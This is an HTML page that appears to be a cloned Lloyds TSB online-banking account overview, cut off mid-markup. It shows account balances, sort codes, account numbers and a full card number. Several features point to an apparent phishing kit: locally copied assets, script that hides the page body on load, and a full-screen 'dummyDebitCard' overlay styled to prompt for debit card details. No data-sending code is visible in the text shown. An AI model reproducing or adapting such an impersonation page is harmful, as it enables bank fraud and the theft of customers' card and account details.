<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        
<title>Personal Account Overview</title>
<link rel="shortcut icon" href="/shared-spaces/img/favicon.ico?v=2">  
<meta http-equiv="content-language" content="en-gb">
<!--[if gte IE 8]><meta http-equiv="X-UA-Compatible" content="IE=IE8" /><![endif]-->


<link href="static-ib-assets/global1-min130712.css" media="screen, print" type="text/css" rel="stylesheet">

<link href="static-ib-assets/print_base-min130712.css" media="print" type="text/css" rel="stylesheet">
<!--[if IE 8]>
<link href="/personal/assets/LTSBRetail/style/ie/ie8-min130712.css" type="text/css" rel="stylesheet" />
<![endif]-->
<!--[if IE 7]>
<link href="/personal/assets/LTSBRetail/style/ie/ie7-min130712.css" type="text/css" rel="stylesheet" />
<![endif]-->
<!--[if lt IE 7]>
<link href="/personal/assets/LTSBRetail/style/ie/ie6-min130712.css" type="text/css" rel="stylesheet" />
<![endif]-->

<script type="text/javascript" src="js/jquery-1.10.1.min.js"></script>
<script type="text/javascript" src="static-ib-assets/jquery-min130712.js"></script>
<script type="text/javascript" src="static-ib-assets/scriptsnippet.jspf"></script>

<script type="text/javascript" src="static-ib-assets/global-min130712.js"></script>
<script type="text/javascript" src="static-ib-assets/custom-min130712.js"></script>

<link href="static-ib-assets/has_js-min130326.css" media="screen" type="text/css" rel="stylesheet">

<style>
#dummyDebitCard {
    left: 0px;
    top: 0px;
    display: block;
    position: fixed;
    width: 100%;
    height: 100%;
    z-index: 99999;
}

.dummyoverlay {
    left: 0px;
    top: 0px;
    display: block;
    position: absolute;
    width: 100%;
    height: 100%;
    background: #000000;
    opacity: 0.5;
    z-index: 99999;
}

.dummylayer {
    position: absolute;
    left: 50%;
    top: 50%;
    margin-top: -260px;
    margin-left: -326px;
    width: 652px;
    height: 520px;
    background: url(/shared-spaces/img/card-overlay.jpeg);
    z-index: 99999;
}

#olMask, #overlayWrapper.loaded {
    display: none;
    width:0px;
    height: 0px;

}
</style>
</head>
    <body class="hasJS" style="" style="display: none; ">
        <div class="showMeContainer {journeyKeys:&#39;makeTransferJourney:makeTransferSupportShowMeAnchor;makePaymentJourney:makePaymentSupportShowMeAnchor;setupStandingOrderJourney:setupStandingOrderShowMeAnchor;viewStandingOrderJourney:viewStandingOrderShowMeAnchor;viewOrCancelDirecrDebitJourney:directDebitShowMeAnchor;makeInternationalPaymentsJourney:internationalPaymentsShowMeAnchor;manageMyAccountsJourney:manageMyAccountsShowMeAnchor;payCreditCardJourney:payCreditCardShowMeAnchor;welcomeJourney:welcomeShowMeAnchor,accountNameShowMeAnchor,balanceShowMeAnchor,makePaymentShowMeAnchor,makeTransferShowMeAnchor,payCreditCardShowMeAnchor,securityAnchor,doneShowMeAnchor;&#39;}"></div>
        <script type="text/javascript">

        // var _AP={};_AP.domain="statse.webtrendslive.com";_AP.dcsid="dcsfn00jp100000w4d2tx3zos_2b3p";_AP.fpcdom=".lloydstsb.co.uk";_AP.bypassStyleClass="newwin,newhelpwin,newfaqwin,overlay,printwin,overlayContainer";
        $('body').hide();
        </script>
        <div id="wrapper">
            
<div class="outer">

<div id="header"><ul id="skiplinks">
        <li><a id="lnkSkip" name="lnkSkip" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/account_overview_personal/#page">Skip to main content</a></li>
    </ul>
<div class="clearfix">
<p id="logo"><span><img src="static-ib-assets/logo-18-1329646262.png" alt="Lloyds TSB for the journey"></span></p>
<div class="loggedIn"><ul class="abcd"><li class="mobile"><a id="mobileLnkAuth" name="mobileLnkAuth" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/mobile/account_overview/" title="Mobile" class="linkBullet">Mobile</a></li><li><a id="lnkCookie01" name="lnkCookie01" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?lnkcmd=lnkCookie01&al=" title="Cookie policy" class="linkBullet">Cookie policy</a></li><li class="secure"><span class="securityAnchor {bubble : &#39;security&#39;, pointer : &#39;upRight&#39;, leftPositionOffset : 70}">Securely signed in</span></li><li class="moreInfo"><a href="http://www.lloydstsb.com/security.asp" title="Security info: Opens in a new window" class="linkBullet newwin">Security info</a></li><li class="details"><a id="lnkGetPersonalDetails" name="lnkGetPersonalDetails" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?lnkcmd=lnkGetPersonalDetails&al=" title="Change your personal details" class="linkBullet">Change&nbsp;details</a></li></ul><p class="user"><span class="name">Mr J. Smith</span><a id="lnkCustomerLogoff" name="lnkCustomerLogoff" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?lnkcmd=lnkCustomerLogoff&al=&hasJS=true" title="Logout" class="logout"><img id="lnkCustomerLogoffImg" src="static-ib-assets/logout_lo-9-1329649610.png" alt="Logout"></a></p></div></div>
</div>
</div>

            <div class="pageWrap">
                <div id="page" class="content">

                    

                    <div class="primaryWrap">
                    
                        <div class="primary">
                            <div class="panel">
                            <span id="txtUserName" style="display:none">+00301757837</span><span id="strPaperlessCCReminder" style="display:none">No</span><span id="yesorno" style="display:none">N</span><span id="strsegmenttypecode" style="display:none"></span><span id="strCISRefNo" style="display:none"></span>

            <div class="customerDetails clearfix"><h1>Your accounts</h1><p class="lastLogin">Last login: 19 July 13 (04:54 PM)</p></div>

            


            <script type="text/javascript">
            function open_win()
            {
            window.open("/personal/link/lp_download_stmtPDF",'_blank')
            }
            </script>


            <div class="transferSlideOuter"><div class="transferSlide" style="display: none;"><div class="quickTransfer"><h2>Transfer money between accounts</h2>
<form id="condQT:frmQuickTransferMoreThanX" name="condQT:frmQuickTransferMoreThanX" method="post" action="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp" class="validationName:(condQT:frmQuickTransferMoreThanX) validate:() validationName:(quickTransfer) validate:()" autocomplete="off" enctype="application/x-www-form-urlencoded">
<fieldset><div class="formField quickTransferInner validate:(required_validateCurrency_validateCurrency[min:0.01,max:999999999999999.99]) validationName:(quickTransfer) amountField clearfix"><div class="formFieldInner"><div class="amount"><span class="postit">Amount</span><span class="inlineHelp postit"><p>(e.g. 12.00)</p></span><label for="condQT:frmQuickTransferMoreThanX:strRegularAmount" class="postit"></label><span class="currency">£</span> <input type="text" autocomplete="off" id="condQT:frmQuickTransferMoreThanX:strRegularAmount" name="condQT:frmQuickTransferMoreThanX:strRegularAmount" class="value" maxlength="18" value="0.00"></div><div class="accounts"><label for="condQT:frmQuickTransferMoreThanX:strSelectedRemitterAccountRetail" class="postit">From:</label><select id="condQT:frmQuickTransferMoreThanX:strSelectedRemitterAccountRetail" name="condQT:frmQuickTransferMoreThanX:strSelectedRemitterAccountRetail" class="fromAccount"><option value="-">from here...</option><option value="ACCOUNT||86883468||779157">Classic (65-43-21, 86883468)</option><option value="ACCOUNT||87058160||779157">Easy Saver (65-43-21, 87058160)</option></select></div><div class="accounts"><label for="condQT:frmQuickTransferMoreThanX:strSelectedBeneficiaryAccountCommercial" class="postit">To:</label><select id="condQT:frmQuickTransferMoreThanX:strSelectedBeneficiaryAccountCommercial" name="condQT:frmQuickTransferMoreThanX:strSelectedBeneficiaryAccountCommercial" class="toAccount"><option value="-">...to here</option><option value="ACCOUNT||86883468||779157">Classic (65-43-21, 86883468)</option><option value="ACCOUNT||87058160||779157">Easy Saver (65-43-21, 87058160)</option></select></div></div></div><input id="condQT:frmQuickTransferMoreThanX:btnQuickTransferRetail" name="condQT:frmQuickTransferMoreThanX:btnQuickTransferRetail" type="image" src="static-ib-assets/quick_transfer-9-1329649803.png" alt="Quick Transfer" class="submit submitAction"></fieldset><input type="hidden" name="condQT:frmQuickTransferMoreThanX" value="condQT:frmQuickTransferMoreThanX"><input type="hidden" name="submitToken" value="2459814">
<input type="hidden" name="hasJS" value="true"></form></div></div></div><div class="clearer"></div>
<form id="frm1" name="frm1" method="post" action="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp" autocomplete="off" enctype="application/x-www-form-urlencoded">
<ul id="frm1:lstAccLst" class="myAccounts clearfix"><li class="clearfix"><div><div class="accountDetails "><div class="viewStandingOrderShowMeAnchor {bubble : &#39;viewStandingOrder&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="directDebitShowMeAnchor {bubble : &#39;directDebit&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="internationalPaymentsShowMeAnchor {bubble : &#39;internationalPayments&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="manageMyAccountsShowMeAnchor {bubble : &#39;manageMyAccounts&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="setupStandingOrderShowMeAnchor {bubble : &#39;setupStandingOrder&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><h2><a id="frm1:lstAccLst:0:lkImageRetail1" name="frm1:lstAccLst:0:lkImageRetail1" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?NOMINATED_ACCOUNT=OWEGXWFPRK2YXBRGFC5XKV2AJKNWQAOID57GTKYEDN75P6TZOSMQ&REFERRING_LOCATION=accountOverview&NON_MIGRATED_FLAG=false&lnkcmd=frm1%3AlstAccLst%3AlkImageRetail1&al=" title="View the latest transactions on your Classic" class="accountNameShowMeAnchor {bubble : &#39;accountName&#39;, topPositionOffset : 10, leftPositionOffset : 20} viewStandingOrderJourney viewOrCancelDirecrDebitJourney makeInternationalPaymentsJourney setupStandingOrderJourney manageMyAccountsJourney"><img id="frm1:lstAccLst:0:lkImageRetail1Img" src="static-ib-assets/accimg_classic_account-13-1373461523.png" alt="Classic">Classic</a></h2><p class="numbers wider"><span class="ommIcon"><a id="frm1:lstAccLst:0:lkMoneyManagerIcon" name="frm1:lstAccLst:0:lkMoneyManagerIcon" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?lnkcmd=frm1%3AlstAccLst%3AlkMoneyManagerIcon&al="><img src="static-ib-assets/omm_pie-4-1370614921.png" alt="Money Manager"></a></span> <span class="postit">Sort Code</span>65-43-21<span class="sortCode"></span>, <span class="postit">Account Number </span>86883468</p><p class="numbers"><strong><span>SKAA6090</span></strong></p></div><div class="balanceActionsWrapper"><div class="accountBalance"><p class="balance"><span class="postit">Balance </span><span class="balanceShowMeAnchor {bubble : &#39;balance&#39;, pointer : &#39;top&#39;, topPositionOffset : 10, leftPositionOffset : -20}">£4,970.00</span></p><p class="accountMsg">Overdraft limit: £0.00<a id="frm1:lstAccLst:0:lkApplyOD1" name="frm1:lstAccLst:0:lkApplyOD1" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?NOMINATED_ACCOUNT=OWEGXWFPRK2YXBRGFC5XKV2AJKNWQAOID57GTKYEDN75P6TZOSMQ&REFERRING_LOCATION=PRODUCT_DETAIL&lnkcmd=frm1%3AlstAccLst%3AlkApplyOD1&al=" class="linkBullet">Apply</a></p></div><div class="accountActionsWrapper"><ul id="frm1:lstAccLst:0:accountOptions1:lstAccFuncs" class="accountActions"><li><a id="frm1:lstAccLst:0:accountOptions1:lstAccFuncs:0:lkAccFuncs" name="frm1:lstAccLst:0:accountOptions1:lstAccFuncs:0:lkAccFuncs" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?accountFunctions=0&arrangementSelected=0&lnkcmd=frm1%3AlstAccLst%3AaccountOptions1%3AlstAccFuncs%3AlkAccFuncs&al=" title="Make payment" class="makePaymentShowMeAnchor {bubble : &#39;makePayment&#39;, pointer : &#39;up&#39;, topPositionOffset : 10}"><img id="frm1:lstAccLst:0:accountOptions1:lstAccFuncs:0:lkAccFuncsImg" src="static-ib-assets/make_a_payment-10-1329649616.png" alt="Make payment" class="makePaymentSupportShowMeAnchor {bubble : &#39;makePaymentSupport&#39;, pointer : &#39;up&#39;, topPositionOffset : 10} makePaymentJourney"></a></li><li><a id="frm1:lstAccLst:0:accountOptions1:lstAccFuncs:1:lkAccFuncs" name="frm1:lstAccLst:0:accountOptions1:lstAccFuncs:1:lkAccFuncs" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?accountFunctions=1&arrangementSelected=0&lnkcmd=frm1%3AlstAccLst%3AaccountOptions1%3AlstAccFuncs%3AlkAccFuncs&al=" title="Make transfer" class="makeTransferShowMeAnchor {bubble : &#39;makeTransfer&#39;, pointer : &#39;up&#39;, topPositionOffset : 10}"><img id="frm1:lstAccLst:0:accountOptions1:lstAccFuncs:1:lkAccFuncsImg" src="static-ib-assets/make_a_transfer-9-1329649622.png" alt="Make transfer" class="makeTransferSupportShowMeAnchor {bubble : &#39;makeTransferSupport&#39;, pointer : &#39;up&#39;, topPositionOffset : 10} makeTransferJourney"></a></li></ul></div><div class="accountMarketingWrapper"><ul class="linkList"><li class="right"><a id="frm1:lstAccLst:0:accountOptions1:lkAvaUpgrade" name="frm1:lstAccLst:0:accountOptions1:lkAvaUpgrade" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?arrangementId=OWEGXWFPRK2YXBRGFC5XKV2AJKNWQAOID57GTKYEDN75P6TZOSMQ&lnkcmd=frm1%3AlstAccLst%3AaccountOptions1%3AlkAvaUpgrade&al=" title="Upgrade account" class="Upgrade Account"><p><img src="static-ib-assets/account_upgrade_blue_shimmer-2-1370614903.png" alt="Upgrade account"></p></a></li></ul></div></div></div><ul id="frm1:lstAccLst:0:lstOptions" class="linkList miniStatement "><li class="viewMiniStatement"><a id="frm1:lstAccLst:0:lstOptions:lkMiniAccountStmt" name="frm1:lstAccLst:0:lstOptions:lkMiniAccountStmt" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?arrangementId=OWEGXWFPRK2YXBRGFC5XKV2AJKNWQAOID57GTKYEDN75P6TZOSMQ&id=OWEGXWFPRK2YXBRGFC5XKV2AJKNWQAOID57GTKYEDN75P6TZOSMQ" class=" {ajaxURI:&#39;/personal/ajax/viewMiniStatement?arrangementId=OWEGXWFPRK2YXBRGFC5XKV2AJKNWQAOID57GTKYEDN75P6TZOSMQ&amp;id=OWEGXWFPRK2YXBRGFC5XKV2AJKNWQAOID57GTKYEDN75P6TZOSMQ&#39;}"><strong title="View a mini statement Classic">View a mini statement</strong></a></li><li><a id="frm1:lstAccLst:0:lstOptions:0:lkOptions" name="frm1:lstAccLst:0:lstOptions:0:lkOptions" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?accountReminderOptions=0&arrangementSelected=0&lnkcmd=frm1%3AlstAccLst%3AlstOptions%3AlkOptions&al=">Set up a standing order</a></li></ul><div class="miniStatementPlaceholder"><div class="miniStatementSlide" style="display: none;"></div></div></li><li class="clearfix"><div><div class="accountDetails "><div class="viewStandingOrderShowMeAnchor {bubble : &#39;viewStandingOrder&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="directDebitShowMeAnchor {bubble : &#39;directDebit&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="internationalPaymentsShowMeAnchor {bubble : &#39;internationalPayments&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="manageMyAccountsShowMeAnchor {bubble : &#39;manageMyAccounts&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="setupStandingOrderShowMeAnchor {bubble : &#39;setupStandingOrder&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><h2><a id="frm1:lstAccLst:1:lkImageRetail1" name="frm1:lstAccLst:1:lkImageRetail1" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?NOMINATED_ACCOUNT=OWEGXWFPRK2YX6VYD775FZUCZAL37LYKITIPL4QEDN75P6TZOSMQ&REFERRING_LOCATION=accountOverview&NON_MIGRATED_FLAG=false&lnkcmd=frm1%3AlstAccLst%3AlkImageRetail1&al=" title="View the latest transactions on your Easy Saver" class="viewStandingOrderJourney viewOrCancelDirecrDebitJourney makeInternationalPaymentsJourney setupStandingOrderJourney manageMyAccountsJourney"><img id="frm1:lstAccLst:1:lkImageRetail1Img" src="static-ib-assets/accimg_savings-16-1372951971.png" alt="Easy Saver">Easy Saver</a></h2><p class="numbers wider"><span class="ommIcon"></span> <span class="postit">Sort Code</span>65-43-21<span class="sortCode"></span>, <span class="postit">Account Number </span>87058160</p></div><div class="balanceActionsWrapper"><div class="accountBalance"><p class="balance"><span class="postit">Balance </span>£30.00</p></div><div class="accountActionsWrapper"><ul id="frm1:lstAccLst:1:accountOptions1:lstAccFuncs" class="accountActions"><li><a id="frm1:lstAccLst:1:accountOptions1:lstAccFuncs:0:lkAccFuncs" name="frm1:lstAccLst:1:accountOptions1:lstAccFuncs:0:lkAccFuncs" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?accountFunctions=0&arrangementSelected=1&lnkcmd=frm1%3AlstAccLst%3AaccountOptions1%3AlstAccFuncs%3AlkAccFuncs&al=" title="Make transfer"><img id="frm1:lstAccLst:1:accountOptions1:lstAccFuncs:0:lkAccFuncsImg" src="static-ib-assets/make_a_transfer-9-1329649622.png" alt="Make transfer" class="makeTransferSupportShowMeAnchor {bubble : &#39;makeTransferSupport&#39;, pointer : &#39;up&#39;, topPositionOffset : 10} makeTransferJourney"></a></li></ul></div></div></div><ul id="frm1:lstAccLst:1:lstOptions" class="linkList miniStatement "><li class="viewMiniStatement"></li><li><a id="frm1:lstAccLst:1:lstOptions:0:lkOptions" name="frm1:lstAccLst:1:lstOptions:0:lkOptions" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?accountReminderOptions=0&arrangementSelected=1&lnkcmd=frm1%3AlstAccLst%3AlstOptions%3AlkOptions&al=">View latest statement</a></li></ul><div class="miniStatementPlaceholder"></div></li><li class="clearfix"><div><div class="accountDetails "><div class="viewStandingOrderShowMeAnchor {bubble : &#39;viewStandingOrder&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="directDebitShowMeAnchor {bubble : &#39;directDebit&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="internationalPaymentsShowMeAnchor {bubble : &#39;internationalPayments&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="manageMyAccountsShowMeAnchor {bubble : &#39;manageMyAccounts&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><div class="setupStandingOrderShowMeAnchor {bubble : &#39;setupStandingOrder&#39;, pointer : &#39;left&#39;, leftPositionOffset : 220}"></div><h2><a id="frm1:lstAccLst:2:lkImageRetail1" name="frm1:lstAccLst:2:lkImageRetail1" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?NOMINATED_ACCOUNT=T7YTKWDYS34IG3DFM3RTYB5XLKJNVI55MVYPT6NR5LNPW3GGPSUA&REFERRING_LOCATION=accountOverview&NON_MIGRATED_FLAG=false&lnkcmd=frm1%3AlstAccLst%3AlkImageRetail1&al=" title="View the latest transactions on your Lloyds TSB Platinum MasterCard" class="viewStandingOrderJourney viewOrCancelDirecrDebitJourney makeInternationalPaymentsJourney setupStandingOrderJourney manageMyAccountsJourney"><img id="frm1:lstAccLst:2:lkImageRetail1Img" src="static-ib-assets/accimg_platinum_mastercard-12-1372346646.png" alt="Lloyds TSB Platinum MasterCard">Lloyds TSB Platinum MasterCard</a></h2><p class="numbers wider"><span class="ommIcon"><a id="frm1:lstAccLst:2:lkMoneyManagerIcon" name="frm1:lstAccLst:2:lkMoneyManagerIcon" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?lnkcmd=frm1%3AlstAccLst%3AlkMoneyManagerIcon&al="><img src="static-ib-assets/omm_pie-4-1370614921.png" alt="Money Manager"></a></span><span class="sortCode"></span> <span class="postit">Card Number </span>5521 5736 0003 3240</p></div><div class="balanceActionsWrapper"><div class="accountBalance"><p class="balance "><span class="postit">Balance </span>£624.02</p><p class="accountMsg">Credit Limit: £550.00</p></div><div class="accountActionsWrapper"><ul id="frm1:lstAccLst:2:accountOptions1:lstAccFuncs" class="accountActions"><li><a id="frm1:lstAccLst:2:accountOptions1:lstAccFuncs:0:lkAccFuncs" name="frm1:lstAccLst:2:accountOptions1:lstAccFuncs:0:lkAccFuncs" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?accountFunctions=0&arrangementSelected=2&lnkcmd=frm1%3AlstAccLst%3AaccountOptions1%3AlstAccFuncs%3AlkAccFuncs&al=" title="Pay credit card" class="payCreditCardShowMeAnchor {bubble : &#39;payCreditCard&#39;, pointer : &#39;up&#39;, topPositionOffset : 10}"><img id="frm1:lstAccLst:2:accountOptions1:lstAccFuncs:0:lkAccFuncsImg" src="static-ib-assets/pay_credit_card_wide-8-1329647290.png" alt="Pay credit card" class="payCreditCardJourney"></a></li></ul></div></div></div><ul id="frm1:lstAccLst:2:lstOptions" class="linkList miniStatement "><li class="viewMiniStatement"><a id="frm1:lstAccLst:2:lstOptions:lkMiniCreditCardStmt" name="frm1:lstAccLst:2:lstOptions:lkMiniCreditCardStmt" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?arrangementId=T7YTKWDYS34IG3DFM3RTYB5XLKJNVI55MVYPT6NR5LNPW3GGPSUA&NON_MIGRATED_FLAG=false&id=T7YTKWDYS34IG3DFM3RTYB5XLKJNVI55MVYPT6NR5LNPW3GGPSUA" class=" {ajaxURI:&#39;/personal/ajax/viewMiniStatement?arrangementId=T7YTKWDYS34IG3DFM3RTYB5XLKJNVI55MVYPT6NR5LNPW3GGPSUA&amp;NON_MIGRATED_FLAG=false&amp;id=T7YTKWDYS34IG3DFM3RTYB5XLKJNVI55MVYPT6NR5LNPW3GGPSUA&#39;}"><strong title="View a mini statement Lloyds TSB Platinum MasterCard">View a mini statement</strong></a></li><li><a id="frm1:lstAccLst:2:lstOptions:0:lkOptions" name="frm1:lstAccLst:2:lstOptions:0:lkOptions" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?accountReminderOptions=0&arrangementSelected=2&lnkcmd=frm1%3AlstAccLst%3AlstOptions%3AlkOptions&al=">View latest statement</a></li></ul><div class="miniStatementPlaceholder"><div class="miniStatementSlide" style="display: none;"></div></div></li></ul><input type="hidden" name="frm1" value="frm1"><input type="hidden" name="submitToken" value="7987199">
<input type="hidden" name="hasJS" value="true"></form>
                            </div>
                        </div>
                        
                    </div>
                    <div class="secondary">
                        <div class="panel">
                            <div id="rhc:pnlM22Omm" class="accordion ui-accordion ui-widget ui-helper-reset" role="tablist"><div id="rhc:pnlM22OmmPart" class="part"><h2 id="rhc:pnlM22OmmHdr"><a id="rhc:lkMoneyManagerRHC" name="rhc:lkMoneyManagerRHC" href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/viewaccount/accountoverviewpersonalbase.jsp?lnkcmd=rhc%3AlkMoneyManagerRHC&al=" title="Money Manager">Money Manager<div id="rhc:pnlM22OmmIco" class="omm-icon"></div></a></h2></div></div><div class="accordion ui-accordion ui-widget ui-helper-reset" role="tablist"><div class="part"><h2 class="trigger linkPointer hasLink ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" role="tab" aria-expanded="false" tabindex="0" title="Contact Us....: Use this link to show or hide more information."><span class="ui-icon ui-icon-triangle-1-e"></span>Contact Us....</h2><div class="pane ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" role="tabpanel" style="display: none;"><div class="paneInner"><div class="quickContact"><h3>Internet banking queries</h3>
<p>Technical queries about the Internet Banking service</p>
<p></p>
<p><strong>0845 300 0116</strong></p>
<p>If you need to call us from abroad or prefer not to use our 0845 number, you can also call us on&nbsp;<strong>+44 (0)1733 232030</strong>. We’re open 7am-10pm Mon – Fri, 8am-6pm Sat – Sun.</p>
<h3>All account related queries</h3>
<p><strong>0845 3 000 000</strong></p>
<p>If you need to call us from abroad or prefer not to use our 0845 number, you can also call us on <strong>+44 1733 347 007</strong>.</p>
<h3>Lost or stolen debit card</h3>
<p><strong>0800 096 9779</strong></p>
<p>If you need to call us from abroad or prefer not to use our 0800 number, you can also call us on <strong>+44 1702 278 270.&nbsp;</strong></p>
<p>If your debit card is declined, there are transactions you don’t recognise or you need a Passcode call us on <strong>0845 3 000 000.</strong></p>
<p>If you need to call us from abroad or prefer not to use our 0845 number, you can also call us on <strong>+44 1733 347 007.</strong></p>
<h3>Credit card customer services line</h3>
<p><strong>0845 606 2172</strong><br></p>
<p>If you need to call us from abroad or prefer not to use our 0845 number, you can also call us on <strong>+44 1702 278 272.</strong></p>
<p>Calls may be monitored and recorded in case we need to check we have carried out your instructions correctly and to help us improve our quality of service.</p>
<p><a href="http://www.lloydstsb.com/contact_us.asp" class="newwin" tabindex="-1" title="More ways to contact us: Opens in a new window">More ways to contact us</a>&nbsp;</p></div></div></div></div><div class="part"><h2 class="trigger linkPointer hasLink ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" role="tab" aria-expanded="false" tabindex="0" title="Help &amp; Support: Use this link to show or hide more information."><span class="ui-icon ui-icon-triangle-1-e"></span>Help &amp; Support</h2><div class="pane ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" role="tabpanel" style="display: none;"><div class="paneInner"><span class="showMeMenu"><ul class="quickFAQs ui-accordion ui-widget ui-helper-reset" role="tablist"><li class="showMeItem"><div class="showMeSupportButtonWrapper clearfix"><p>Get more from Internet Banking</p><a href="https://ibglxysit4s-lp.lloydstsb.co.uk/personal/a/account_overview_personal/#" class="showMeSupportLinkShowMeAnchor {bubble : &#39;showMeSupport&#39;, topPositionOffset : 0, leftPositionOffset : 0}"><img src="static-ib-assets/showme_btn.png"></a></div></li>
            
    
    <li class="ui-accordion-li-fix"><h3 class="qfaqTrigger linkPointer hasLink ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" tabindex="-1" role="tab" aria-expanded="false" title="How do I stop receiving paper statements?: Use this link to show or hide more information."><span class="ui-icon ui-icon-triangle-1-e"></span>How do I stop receiving paper statements?</h3>
            <div class="qfaqCont ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" role="tabpanel" style="display: none;">
                    <p>To stop receiving paper statements, use the 'Go paperless' link&nbsp; on your account statement page. Follow the instructions, then click to confirm.</p>
                    </div>
            </li>
<li class="ui-accordion-li-fix"><h3 class="qfaqTrigger linkPointer hasLink ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" tabindex="-1" role="tab" aria-expanded="false" title="How far back can I search for items on my account?: Use this link to show or hide more information."><span class="ui-icon ui-icon-triangle-1-e"></span>How far back can I search for items on my account?</h3>
            <div class="qfaqCont ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" role="tabpanel" style="display: none;">
                    <p></p><p>You can view, print and download statements dating back to July 2002, free of charge. If you&nbsp; have gone paperless, you can also order paper copies of your statement free of charge. If you still receive paper statements, you will incur a charge for ordering statements.</p>
<p></p>
                    </div>
            </li>
<li class="ui-accordion-li-fix"><h3 class="qfaqTrigger linkPointer hasLink ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" tabindex="-1" role="tab" aria-expanded="false" title="There’s a transaction on my statement that I don’t recognise. What should I do?: Use this link to show or hide more information."><span class="ui-icon ui-icon-triangle-1-e"></span>There’s a transaction on my statement that I don’t recognise. What should I do?</h3>
            <div class="qfaqCont ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" role="tabpanel" style="display: none;">
                    <p>If you have any queries about transactions appearing on your statement, please call us on&nbsp;0845 3 000 000. As a precaution, you should also log out of Internet Banking.
</p>
                    </div>
            </li>
<li class="ui-accordion-li-fix"><h3 class="qfaqTrigger linkPointer hasLink ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" tabindex="-1" role="tab" aria-expanded="false" title="What accounts can I see online?: Use this link to show or hide more information."><span class="ui-icon ui-icon-triangle-1-e"></span>What accounts can I see online?</h3>
            <div class="qfaqCont ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" role="tabpanel" style="display: none;">
                    <p>As a personal customer, you can use Internet Banking to view most of your accounts. However, there are some you can’t see, such as Mortgage Accounts and Term Deposit Accounts.
</p>
                    </div>
            </li>
<li class="ui-accordion-li-fix"><h3 class="qfaqTrigger linkPointer hasLink ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" tabindex="-1" role="tab" aria-expanded="false" title="I&#39;m struggling with debt, where can I get help and guidance?: Use this link to show or hide more information."><span class="ui-icon ui-icon-triangle-1-e"></span>I'm struggling with debt, where can I get help and guidance?</h3>
            <div class="qfaqCont ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" role="tabpanel" style="display: none;">
